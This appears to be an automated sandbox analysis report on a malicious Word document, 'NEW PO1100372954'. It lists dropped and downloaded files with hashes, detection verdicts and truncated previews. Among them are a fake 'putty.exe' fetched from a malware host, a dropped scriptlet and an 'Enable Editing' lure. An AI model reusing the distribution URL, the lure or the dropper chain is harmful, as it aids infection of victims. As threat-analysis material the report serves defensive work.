                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1..a..............P..............L... ...`....@.. .......................`............@..................................K..O....`.. ....................@....................................................... ............... ..H............text....,... ...................... ..`.rsrc... ....`.......0..............@..@.reloc.......@......................@..B.................K......H........0..d.......s........o............................................(....*&..(.....*.s.........s ........s!........s"........s#........*...0...........~....o$....+..*.0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0..<........~.....().....,!r...p.....(*...o+...s,............~.....+..*.0...........~.....+..*".......*.0..&........(....r1..p~....o-...(......t$....+..*...0..&........(....r7..p~....o-...(......
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exe
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:downloaded
                                Size (bytes):731648
                                Entropy (8bit):7.501590274865465
                                Encrypted:false
                                SSDEEP:12288:hdJnZDHQg/eZ0EaMEH+a2C9mIzUewRTCABR4x9kB3AHwmV2h1mFbiwN2:Pw05H+NC9mIzUewRTC0Ui3APmY
                                MD5:0CFE251E0B61BBC87656F52DEFAD4C53
                                SHA1:D7126889DC5FFCF23C90FFA19A359060658A0388
                                SHA-256:DB531D6E969F16A9318224E16A18F3314FA75D0EAAD90FC9A805F10D098D67C9
                                SHA-512:85E15BF86BC62B9AE552FAC7118A9F54631BA84FDF60ACB803348813B67E0B4349F82FBF312474879C3DC209E06EC21E8BFACEDF91CA2D3B490270F655BF980D
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 28%
                                Reputation:unknown
                                IE Cache URL:http://newhosteeeee.ydns.eu/putty.exe
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F..a..............P.. ..........z;... ...@....@.. ....................................@.................................(;..O....@.......................`....................................................... ............... ..H............text...`.... ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......(..............@..B................\;......H........................... w...........................................0............(+...(,.........(.....o-....*.....................(.......(/......(0......(1......(2....*N..(....o....(3....*&..(4....*.s5........s6........s7........s8........s9........*....0...........~....o:....+..*.0...........~....o;....+..*.0...........~....o<....+..*.0...........~....o=....+..*.0...........~....o>....+..*.0..<........~.....(?.....,!r...p.....(@...oA...sB............~.....+..*.0......
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\11DB366A.png
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:370 sysV pure executable
                                Category:dropped
                                Size (bytes):262160
                                Entropy (8bit):0.0018414541227182795
                                Encrypted:false
                                SSDEEP:3:8aB/lYv2Hblll5l/lHd/lXF4/:zBav27K/
                                MD5:36148DAEC9FF9C3487586B72447DAC7B
                                SHA1:FEE4FB27C45CE43BDB41BA190FDC11704EC3EA54
                                SHA-256:E3AC1E0A5DD46E9D605470CBB3C427582A180024754595370A1BCA98031BA426
                                SHA-512:E41BFECCD86CE8DCCDBCAF3B4068A7D328D91AAB035468201169817660EB539816FA4AD9BB5E60D828C421755D01680B8AD0BA0E6C395973AFFDBDAAEA5D11FD
                                Malicious:false
                                Reputation:unknown
                                Preview: X.&.......f.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9029FF63.wmf
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\005"
                                Category:dropped
                                Size (bytes):3730
                                Entropy (8bit):5.027033050759854
                                Encrypted:false
                                SSDEEP:48:5Wik/UKHl3G6nj6rmbYf3LSrd/lO88e0f5aSdJ9nNk3t1fo:Jk7Hgwj+mbYf3LSrhlOs0f5aSdHn63DA
                                MD5:5648227A1DC795BD5B4961DAD493E795
                                SHA1:1611B47CE3F0AD0D19EEE0E27AB2CF3A8190B0D7
                                SHA-256:200124261ED676F6C2D812191655E2EC735897137E93ED676BD22AD6E455FC7A
                                SHA-512:3714019501B872EC8D514909F21108611A79C65C204C8251F01338CDDF76CB32BFDB2BB1CF3545E0A1D1D88549954F5F7999B9EE05A053FF73E323560B4FFB14
                                Malicious:false
                                Reputation:unknown
                                Preview: ..................................5...........................Segoe UI....C......@...............-...........................A..... . ..... . ...7.(... ...@.............................................................................................................................................................................................................................................................................................?.........!...A.F.f. . ..... . ...7.(... ... ................................................................................................................................................................................................................................................................................................................................G .>..:..9..8..8..8..9..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:.i2........K..S(.O$.N!.N!.N!.N!.N".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".N".M".M".O$.S).O".......l
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2631CAF7-C3D4-4848-8C82-E142953DDA5E}.tmp
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):44618
                                Entropy (8bit):2.916482234929812
                                Encrypted:false
                                SSDEEP:768:Dr/3ViFs0Dqeb4Zep84JtueJvCI19rIwzWSgUg4P58F:nFia0Dqeb0nstw29rVzWSgm58F
                                MD5:CFD90F1E4A07FBF4850CB646C76C0AC9
                                SHA1:E9692ED21B6AFE1B5D587ECA5A20330676ED3325
                                SHA-256:0989F417091A5262338DEACB63FA9D9129741D9C862B67E6F8060DB43E67BAAE
                                SHA-512:53383F93D07DDE48873F5CA2069F1F653723B20BC7BC51C78530B628764243C2622E54C0545D83D14AEAC0521F018EBE490A20F1DB63446EA70943871A541A86
                                Malicious:false
                                Reputation:unknown
                                Preview: c.0.5.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .d.o.e.s. .n.o.t. .w.o.r.k. .i.n. .e.m.a.i.l. .P.r.e.v.i.e.w.....P.l.e.a.s.e. .d.o.w.n.l.o.a.d. .t.h.e. .d.o.c.u.m.e.n.t. .a.n.d. .c.l.i.c.k. .E.n.a.b.l.e. .E.d.i.t.i.n.g. .w.h.e.n. .o.p.e.n.i.n.g.......=......... .P.a.c.k.a.g.e.E.M.B.E.D.W.o.r.d...D.o.c.u.m.e.n.t...8.........=....... .\.a. .W.o.r.d...D.o.c.u.m.e.n.t...8. .".%.T.M.P.%.\.\.a.b.d.t.f.h.g.h.g.d.g.h.g.h.....S.C.T.". .".e.w.:.{.0.0.0.0.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.0.0.0.0.0.0.0.0.}.".....................................4...>...D.................................................................................................................................................................................................................................................................................................................CJ..OJ..QJ..^J..aJ.....j....CJ..OJ..QJ..U..^J..aJ.. .j.N.d...CJ..OJ..QJ..U..^J..aJ.....h.CK.5..CJ..OJ..QJ..^J..aJ....h.CK.CJ..OJ..QJ..^J..aJ.
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CEE3E709-76F5-433D-BD56-9523C4C9DC31}.tmp
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):1536
                                Entropy (8bit):1.3573187972516119
                                Encrypted:false
                                SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlb3:IiiiiiiiiifdLloZQc8++lsJe1MzK/
                                MD5:CD4DCADB7EAF8EBC3C0D123D947A31DC
                                SHA1:37AFAD9A59B5EF6715E976B43C141DA08A1758A5
                                SHA-256:0AA54F5023AB6361CC2ACD4C28F082149BA87BDC042BA7374CD02AFCAA01B5F1
                                SHA-512:30B40C28DCDED02E8FFCE1BF40777B76D904C1EC1D2D5DFD3E18BB3B783E6CD8B6AD76D9733ACF32E2FD01140AF54FF134FBE10F5615407E8B078BAC093E82CB
                                Malicious:false
                                Reputation:unknown
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E195593A-72A2-4470-89E8-B7D87A58E0E0}.tmp
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):1024
                                Entropy (8bit):0.05390218305374581
                                Encrypted:false
                                SSDEEP:3:ol3lYdn:4Wn
                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                Malicious:false
                                Reputation:unknown
                                C:\Users\user\AppData\Local\Temp\OICE_9306262C-FECE-4A9E-949D-FCC308D5F5A8.0\FLD93F.tmp
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:370 sysV pure executable
                                Category:dropped
                                Size (bytes):262160
                                Entropy (8bit):0.0018414541227182795
                                Encrypted:false
                                SSDEEP:3:8aB/lYv2Hblll5l/lHd/lXF4/:zBav27K/
                                MD5:36148DAEC9FF9C3487586B72447DAC7B
                                SHA1:FEE4FB27C45CE43BDB41BA190FDC11704EC3EA54
                                SHA-256:E3AC1E0A5DD46E9D605470CBB3C427582A180024754595370A1BCA98031BA426
                                SHA-512:E41BFECCD86CE8DCCDBCAF3B4068A7D328D91AAB035468201169817660EB539816FA4AD9BB5E60D828C421755D01680B8AD0BA0E6C395973AFFDBDAAEA5D11FD
                                Malicious:false
                                Reputation:unknown
                                C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):20480
                                Entropy (8bit):5.821101833795217
                                Encrypted:false
                                SSDEEP:384:3ymxaIgzzacasapa2hoygn1VYdNl6UnRJbtqEEE6oEaE3/nh:3ymxaPzacasapa2vgnrYdNl6Un7ZFPWb
                                MD5:EAF98295C742E17B01760B98BDB04235
                                SHA1:E729C9F20DCF8AC722517FCADD4D87BEDE21F49E
                                SHA-256:4F4EAAF614069BBFC3977DB75BD69A32A4BA95E5AD1A8B28348E4051A16D10A6
                                SHA-512:E2BDF0C22670A538D38A8AD8C0AA9DF59B253BDF3C49CA4724650382F490642C99134024F13AAD64B02D5EDC42B6A4759D10156ABE1E9274DC977C2270C57E48
                                Malicious:true
                                Reputation:unknown
                                Preview: ..<scriptleT.. >.. .......................... .............. ................. ........ ................. ...... ..............'... .............. ........... ........... ................... ...... ........ ........... ............ ...... .................... ........... ............ ...... ............'... ............................ ...... ........ ........... ................. ...... ........... ........ ...................... .................... ......... ......................... ..
                                C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT:Zone.Identifier
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):27
                                Entropy (8bit):3.9582291686698787
                                Encrypted:false
                                SSDEEP:3:gAWY3W:qY3W
                                MD5:833C0EFD3064048FD6A71565CA115CCD
                                SHA1:0E6D2A1D4B6AFA705EA6267EEED3655FD2B39B9D
                                SHA-256:4A86B6E7D2544AFC717EAC2B60ADBED0F0C68D49D723B2123F65C64C76579FBF
                                SHA-512:536C2BB6ED98C190CE98BE01A31BD05FE03D90532B5B4194CAA58671F43AD4D65F7F828D8AC1F43A6A13DCA581205416DA094CA4DACAEFACB8D901FC48CCEB7A
                                Malicious:false
                                Reputation:unknown
                                Preview: [ZoneTransfer]..ZoneId=3..3
                                C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\catalog.dat
                                Process:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):0
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:48:Ik/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwh:flC0IlC0IlC0IlC0IlC0IlC0IlC0IlCr
                                MD5:0FBED11864C03FDED0E70014DCF84578
                                SHA1:453723D938A03252F705B0A104986FE4C5CA7056
                                SHA-256:70F5E49EE3091777827ED661B63842061220C899A708860986E9AA1BD87C5004
                                SHA-512:DB53E3F1D18171F1D86C1B9BBF6BBD07153FC3E561834A35834BC0CA1E034FEDCD83AAAE7EDF9262C4E175C3D2287B647F55282E49627EAAF587F43714204667
                                Malicious:false
                                Reputation:unknown
                                C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat
                                Process:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                File Type:International EBCDIC text, with no line terminators, with overstriking
                                Category:dropped
                                Size (bytes):0
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:fw8:L
                                MD5:D3A8D9A8FD8375694BCBA2EC51445C4C
                                SHA1:A03346DBB4462D95874BDDCAD43170DCEEEF6D43
                                SHA-256:70665DB3A770558DC9DABFA25D640E9FF4692BA75CCF7975C726786ACA624582
                                SHA-512:EE6A992578524486D72CBCBF2240C3A0FE32A1C4AD72736B7834E22741A223BBF233BAECFF2A0460A6D60E9ED7023F25D62650257E2121ECC4AF34D0C7ADA628
                                Malicious:true
                                Reputation:unknown
                                Preview: ...o.U.H
                                C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\settings.bak
                                Process:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):0
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:9bzY6oRDIvYk:RzWDI3
                                MD5:ACD3FB4310417DC77FE06F15B0E353E6
                                SHA1:80E7002E655EB5765FDEB21114295CB96AD9D5EB
                                SHA-256:DC3AE604991C9BB8FF8BC4502AE3D0DB8A3317512C0F432490B103B89C1A4368
                                SHA-512:DA46A917DB6276CD4528CFE4AD113292D873CA2EBE53414730F442B83502E5FAF3D1AE87BFA295ADF01E3B44FDBCE239E21A318BFB2CCD1F4753846CB21F6F97
                                Malicious:false
                                Reputation:unknown
                                Preview: 9iH...}Z.4..f..J".C;"a
                                C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\settings.bin
                                Process:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):0
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:9bzY6oRDIvYVsRLY6oRDT6P2bfVn1:RzWDIfRWDT621
                                MD5:BB0F9B9992809E733EFFF8B0E562CFD6
                                SHA1:F0BAB3CF73A04F5A689E6AFC764FEE9276992742
                                SHA-256:C48F04FE7525AA3A3F9540889883F649726233DE021724823720A59B4F37CEAC
                                SHA-512:AE4280AA460DC1C0301D458A3A443F6884A0BE37481737B2ADAFD72C33C55F09BED88ED239C91FE6F19CA137AC3CD7C9B8454C21D3F8E759687F701C8B3C7A16
                                Malicious:false
                                Reputation:unknown
                                Preview: 9iH...}Z.4..f..J".C;"a9iH...}Z.4..f.~a........~.~.......3.U.
                                C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\storage.dat
                                Process:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):0
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:6144:oX44S90aTiB66x3Pl6nGV4bfD6wXPIZ9iBj0UeprGm2d7Tm:LkjYGsfGUc9iB4UeprKdnm
                                MD5:7E8F4A764B981D5B82D1CC49D341E9C6
                                SHA1:D9F0685A028FB219E1A6286AEFB7D6FCFC778B85
                                SHA-256:0BD3AAC12623520C4E2031C8B96B4A154702F36F97F643158E91E987D317B480
                                SHA-512:880E46504FCFB4B15B86B9D8087BA88E6C4950E433616EBB637799F42B081ABF6F07508943ECB1F786B2A89E751F5AE62D750BDCFFDDF535D600CF66EC44E926
                                Malicious:false
                                Reputation:unknown
                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\NEW PO1100372954 -.LNK
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Aug 26 14:08:15 2020, atime=Mon Aug 2 16:59:36 2021, length=234750, window=hide
                                Category:dropped
                                Size (bytes):2108
                                Entropy (8bit):4.563563676778922
                                Encrypted:false
                                SSDEEP:48:8it+/XT0jFx1aCZwfY2it+/XT0jFx1aCZwfc:8it+/XojFHDwfY2it+/XojFHDwfc
                                MD5:63DA06EC5F4B14A27137DD323B31070F
                                SHA1:CC221AF186196FB5381FCFEB99E975DAC5666D43
                                SHA-256:9E42FBE9B5CFF3DD2749ABC139522936D6BCB28E5FB70D919750E51F80768895
                                SHA-512:D8DB266A0FA3B50F475FE5FA5463751147B3F74BD2BA91CEE3CDEEB23B434CE8BCCC8089CCB4718A3C57CD433D73D329B104CAF3B454159F3BF3EDA4796BCC96
                                Malicious:false
                                Reputation:unknown
                                Preview: L..................F.... ...-....{..-....{.....'................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....v.2......Ss. .NEWPO1~1.DOC..Z.......Q.y.Q.y*...8.....................N.E.W. .P.O.1.1.0.0.3.7.2.9.5.4. .-...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\899552\Users.user\Desktop\NEW PO1100372954 -.doc.-.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.N.E.W. .P.O.1.1.0.0.3.7.2.9.5.4. .-...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......899552..........D_....3N...W..
                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):92
                                Entropy (8bit):4.571374526629979
                                Encrypted:false
                                SSDEEP:3:M1LSUPkcQjOru4oziUPkcQjOru4omX1LSUPkcQjOru4ov:MVnP66ru443P66ru4DnP66ru4y
                                MD5:0865393879B83EFC01FD7C549E71A9A5
                                SHA1:899AE6A283B9B9F0F62475C18E135B09397ED727
                                SHA-256:967255627D9D9D210D5279B8DAFF2975BE25A21A3E7E1E756896AEEF41B4751C
                                SHA-512:E8FA619372F9FDCF50114BF8C42C56163ECA7E325BFF8C72F9E1685D79E70FEF45A7270420576110EB1C382D70A2B1EB8F44A788451A852B0F5BCBD5F7D628CE
                                Malicious:false
                                Reputation:unknown
                                Preview: [doc]..NEW PO1100372954 -.LNK=0..NEW PO1100372954 -.LNK=0..[doc]..NEW PO1100372954 -.LNK=0..
                                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):162
                                Entropy (8bit):2.4311600611816426
                                Encrypted:false
                                SSDEEP:3:vrJlaCkWtVyyKbE/w+FUYlln:vdsCkWt/AE51ll
                                MD5:B1035D12CDF3CD7AA18A33C0A1D17AAE
                                SHA1:CE8244E4A5E407568BA15A7C6DC2F6428306EBB8
                                SHA-256:CD49B04F30968B85CBAFD1F9F836CA1950BBEC2BE717B3D1430DBE57615BF425
                                SHA-512:E34F595696EB91153F1B8EE51D12F48ED8B8969453FA76B97DB94C509F6BDF089466DEE51A51727AD5A8B546F6C96FF679ADA98A451EEACA3CB9C08C01F388B6
                                Malicious:false
                                Reputation:unknown
                                Preview: .user..................................................A.l.b.u.s.............p.......................................P......................z...............x...
                                C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                Category:dropped
                                Size (bytes):2
                                Entropy (8bit):1.0
                                Encrypted:false
                                SSDEEP:3:Qn:Qn
                                MD5:F3B25701FE362EC84616A93A45CE9998
                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                Malicious:false
                                Reputation:unknown
                                Preview: ..
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\490281AC8GSCNCH37UYE.temp
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8016
                                Entropy (8bit):3.5836145728363404
                                Encrypted:false
                                SSDEEP:96:chQCAMqoqvsqvJCwo+z8hQCAMqoqvsEHyqvJCworQz2QYVHtyByCHFlUVUIu:cGho+z8G5HnorQz2rurH9Iu
                                MD5:BF6DEE5BCCB0B3116AFC11A073DF62BB
                                SHA1:8E65F7FF14D5E4407C32BA959CE795D072AD826E
                                SHA-256:3D61A8493060F9D327B5C392075EB14240C046DC6D9B89C6370FF18F017060F4
                                SHA-512:30F1CE1F899D17E99BDCE356D78C138BA6C8A7CDCDB6E64723A57B7E8DBBFF09E666BAB8D0D9F6F912B108F79EF27AB5BE5907806A90960EFE5204B933486E14
                                Malicious:false
                                Reputation:unknown
                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Q.y..Programs..f.......:...Q.y*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8016
                                Entropy (8bit):3.5836145728363404
                                Encrypted:false
                                SSDEEP:96:chQCAMqoqvsqvJCwo+z8hQCAMqoqvsEHyqvJCworQz2QYVHtyByCHFlUVUIu:cGho+z8G5HnorQz2rurH9Iu
                                MD5:BF6DEE5BCCB0B3116AFC11A073DF62BB
                                SHA1:8E65F7FF14D5E4407C32BA959CE795D072AD826E
                                SHA-256:3D61A8493060F9D327B5C392075EB14240C046DC6D9B89C6370FF18F017060F4
                                SHA-512:30F1CE1F899D17E99BDCE356D78C138BA6C8A7CDCDB6E64723A57B7E8DBBFF09E666BAB8D0D9F6F912B108F79EF27AB5BE5907806A90960EFE5204B933486E14
                                Malicious:false
                                Reputation:unknown
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms. (copy)
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8016
                                Entropy (8bit):3.5836145728363404
                                Encrypted:false
                                SSDEEP:96:chQCAMqoqvsqvJCwo+z8hQCAMqoqvsEHyqvJCworQz2QYVHtyByCHFlUVUIu:cGho+z8G5HnorQz2rurH9Iu
                                MD5:BF6DEE5BCCB0B3116AFC11A073DF62BB
                                SHA1:8E65F7FF14D5E4407C32BA959CE795D072AD826E
                                SHA-256:3D61A8493060F9D327B5C392075EB14240C046DC6D9B89C6370FF18F017060F4
                                SHA-512:30F1CE1F899D17E99BDCE356D78C138BA6C8A7CDCDB6E64723A57B7E8DBBFF09E666BAB8D0D9F6F912B108F79EF27AB5BE5907806A90960EFE5204B933486E14
                                Malicious:false
                                Reputation:unknown
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LOCAUF6YJEF7K6W8Y37G.temp
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8016
                                Entropy (8bit):3.5836145728363404
                                Encrypted:false
                                SSDEEP:96:chQCAMqoqvsqvJCwo+z8hQCAMqoqvsEHyqvJCworQz2QYVHtyByCHFlUVUIu:cGho+z8G5HnorQz2rurH9Iu
                                MD5:BF6DEE5BCCB0B3116AFC11A073DF62BB
                                SHA1:8E65F7FF14D5E4407C32BA959CE795D072AD826E
                                SHA-256:3D61A8493060F9D327B5C392075EB14240C046DC6D9B89C6370FF18F017060F4
                                SHA-512:30F1CE1F899D17E99BDCE356D78C138BA6C8A7CDCDB6E64723A57B7E8DBBFF09E666BAB8D0D9F6F912B108F79EF27AB5BE5907806A90960EFE5204B933486E14
                                Malicious:false
                                Reputation:unknown
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RA5AG9965KYDVANTRM0T.temp
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8016
                                Entropy (8bit):3.5836145728363404
                                Encrypted:false
                                SSDEEP:96:chQCAMqoqvsqvJCwo+z8hQCAMqoqvsEHyqvJCworQz2QYVHtyByCHFlUVUIu:cGho+z8G5HnorQz2rurH9Iu
                                MD5:BF6DEE5BCCB0B3116AFC11A073DF62BB
                                SHA1:8E65F7FF14D5E4407C32BA959CE795D072AD826E
                                SHA-256:3D61A8493060F9D327B5C392075EB14240C046DC6D9B89C6370FF18F017060F4
                                SHA-512:30F1CE1F899D17E99BDCE356D78C138BA6C8A7CDCDB6E64723A57B7E8DBBFF09E666BAB8D0D9F6F912B108F79EF27AB5BE5907806A90960EFE5204B933486E14
                                Malicious:false
                                Reputation:unknown
                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Q.y..Programs..f.......:...Q.y*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                Process:C:\ProgramData\images.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):1378816
                                Entropy (8bit):7.548476087877472
                                Encrypted:false
                                SSDEEP:24576:26IBQ76DOifx8Dgyfx8Dgz06TbTZpq72pMNaDuDHQUl3uwDZzGL:OQ76f58Dgy58Dgz06n1pfWNdlJZa
                                MD5:8FA8F52DFC55D341300EFF8E4C44BA33
                                SHA1:4FBDB8C39BBC48B159E1F795A2222D51077FDBE9
                                SHA-256:2C7DA7FF43C90AE620FD5135C2ED34C7E644A9A1098BFB69F1DC6B8AB6410C9A
                                SHA-512:A29B2B8FCDE4EF5917E6AAD29C547D2FCEF3E452B3ED502788BD5BF7CB2E107C46A12783EBBE8EB4AA896C56DFD3FD37C994B67EB5C8F5C9C32FBA75FE486205
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 20%
                                Reputation:unknown
